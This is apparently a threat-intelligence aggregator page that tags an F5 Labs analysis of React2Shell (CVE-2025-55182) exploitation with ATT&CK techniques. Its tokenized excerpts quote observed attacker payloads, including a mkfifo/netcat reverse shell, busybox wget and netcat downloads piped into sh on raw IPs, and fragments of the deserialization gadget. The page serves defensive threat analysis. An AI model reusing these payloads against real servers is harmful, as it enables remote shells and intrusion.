TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

F5 Labs

Analyzing React2Shell Threat Actors

2026-01-16 · Read original ↗

ATT&CK techniques detected

9 predictions
T1059.004Unix Shell
98%
"##mp / f ; mkfifo / tmp / f ; cat / tmp / f | / bin / sh - i 2 > & 1 | nc 193. 142. 147. 209 12323 > / tmp / f ' ) ; ", " _ formdata " : { " get " : " $ 1 : constructor : constructor " } } } the payload synchronously runs a chained shell that cds to / tmp, fetches hxxp : / / 94. …"
T1190Exploit Public-Facing Application
93%
"has rapidly become a significant threat. this vulnerability allows attackers to execute arbitrary code by exploiting unsafe deserialization in react server components. developers should apply patches and review their code for unsafe deserialization practices. cve - 2023 - 1389, a…"
T1190Exploit Public-Facing Application
92%
"critical cvss score of 10. 0 emerges, a certain buzz is generated within the cybersecurity community as we come to grips with the technical details of the issue, work to patch and protect services, and communicate insights. cve - 2025 - 551821, otherwise known as react2shell, was…"
T1059.004Unix Shell
89%
"##s ; busybox wget - q hxxp : / / 193. 34. 213. 150 / nuts / bolts - o - | sh ) ', { ' timeout ' : 120000 } ). tostring ( ). trim ( ) ; ; throw object. assign ( new error ( ' next _ redirect ' ), { digest : ` $ { res } ` } ) ; ", " _ chunks " : " $ q2 ", " _ formdata " : { " get …"
T1059.004Unix Shell
88%
"nc 45. 125. 66. 90 3443 | | telnet 45. 125. 66. 90 3443 ) | sh ' ). tostring ( ). trim ( ) ; ; throw object. assign ( new error ( ' next _ redirect ' ), { digest : ` next _ redirect ; push ; / login? a = $ { res } ; 307 ; ` } ) ; ", " _ chunks " : " $ q2 ", " _ formdata " : { " g…"
T1190Exploit Public-Facing Application
81%
"analyzing react2shell threat actors the sensor intel series is created in partnership with efflux, who maintains a globally distributed network of sensors from which we derive attack telemetry. introduction in this installment of the sensor intel series, we provide an analysis of…"
T1059.004Unix Shell
80%
"continue to track rondodox botnet activity, it comes as little surprise that this actor is capitalizing on a new critical rce vulnerability, especially as we have seen their behaviour shift recently to more web - focused efforts. this payload is a downloader - exec chain that fet…"
T1059.004Unix Shell
73%
"interactive fileless shell back to the operator and will keep the server function blocked under execsync until the socket closes. it relies on wget, / bin / sh, and nc being present, uses raw ips to avoid dns, and stages entirely under / tmp for easy write access and minimal pers…"
T1059.004Unix Shell
54%
". 150 / nuts / bolts and pipes it directly into sh ; the stdout is captured and immediately thrown as a next _ redirect error with a digest containing the command output, which is a tactic to surface results to the client or logs without a normal response. primary iocs include ou…"

Summary

Sensor Intel Series: December CVE-2025-55182 Trends